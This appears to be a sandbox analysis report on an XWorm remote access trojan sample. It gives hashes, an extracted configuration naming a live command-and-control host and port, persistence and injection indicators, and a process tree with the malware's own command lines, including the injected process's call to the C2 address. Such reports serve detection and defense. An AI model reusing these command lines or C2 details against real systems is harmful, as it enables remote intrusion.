xworm | 69e64197df607beef78dfe23becf35c27ada625ccdf4af18f1581eb6bb9cdb1f

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
09/03/2025, 10:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XClient.exe
Size

38KB
MD5

3fbdcdb5e28ab2aa70bc40bfd62c58f2
SHA1

671caad39200370a3f824071cca98fec46b71028
SHA256

69e64197df607beef78dfe23becf35c27ada625ccdf4af18f1581eb6bb9cdb1f
SHA512

f47fe73ebc639c7fcfaca901b3cac1efa2aa70d64e723e343fd55e3e147771e1efd2d45fc4291ef88fc430f8c268cba7524cf12c0d03c77b4519ee0b733d8198
SSDEEP

768:DVs8G/39vvxdnPNCx/BN7FWP99WxPOMhyjIkk:DSBFpBNCx3FK9WxPOMIM

Score

10^/10

xworm discovery rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

percent-wing.gl.at.ply.gg:20092

Mutex

7xFg772vQo2QbWWQ

Attributes

Install_directory
%AppData%
install_file
XClient.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3952-1-0x0000000000470000-0x0000000000480000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	XClient.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3952 set thread context of 6072	3952	XClient.exe	120

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe

Enumerates system info in registry 2 TTPs 11 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133859902184028764"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 20 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5704	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3952	XClient.exe
3952	XClient.exe
1456	chrome.exe
1456	chrome.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
3952	XClient.exe
6116	powershell.exe
6116	powershell.exe
6116	powershell.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
5712	msedge.exe
5712	msedge.exe
4432	msedge.exe
4432	msedge.exe
5412	chrome.exe
5412	chrome.exe
6168	identity_helper.exe
6168	identity_helper.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe
2944	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5704	explorer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
5412	chrome.exe
5412	chrome.exe
5412	chrome.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
5412	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3952	XClient.exe
Token: SeDebugPrivilege	3952	XClient.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeDebugPrivilege	6116	powershell.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	5412	chrome.exe
Token: SeCreatePagefilePrivilege	5412	chrome.exe
Token: SeShutdownPrivilege	1456	chrome.exe
Token: SeCreatePagefilePrivilege	1456	chrome.exe
Token: SeShutdownPrivilege	5412	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
5412	chrome.exe
5412	chrome.exe
5412	chrome.exe
5412	chrome.exe
5412	chrome.exe
5412	chrome.exe
5412	chrome.exe
5412	chrome.exe
5412	chrome.exe
5412	chrome.exe
5412	chrome.exe
5412	chrome.exe
5412	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe
1456	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3952	XClient.exe
5704	explorer.exe
5704	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1456 wrote to memory of 3456	1456	chrome.exe	101
PID 1456 wrote to memory of 3456	1456	chrome.exe	101
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 740	1456	chrome.exe	102
PID 1456 wrote to memory of 2208	1456	chrome.exe	103
PID 1456 wrote to memory of 2208	1456	chrome.exe	103
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104
PID 1456 wrote to memory of 4080	1456	chrome.exe	104

C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
1⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3952
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.26 20092 <123456789> 463B0A96B9BB07E5328C
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6072
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:6116
  - - C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
      4⤵
      System Location Discovery: System Language Discovery
      PID:5752
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:4432
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffeb6f546f8,0x7ffeb6f54708,0x7ffeb6f54718
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:2944
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2116 /prefetch:2
      4⤵
      PID:6128
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2156 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5712
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2720 /prefetch:8
      4⤵
      PID:5600
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
      4⤵
      PID:3504
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
      4⤵
      PID:5436
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
      4⤵
      PID:3376
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4376 /prefetch:1
      4⤵
      PID:6112
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3352 /prefetch:8
      4⤵
      PID:860
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3352 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:6168
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
      4⤵
      PID:6184
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
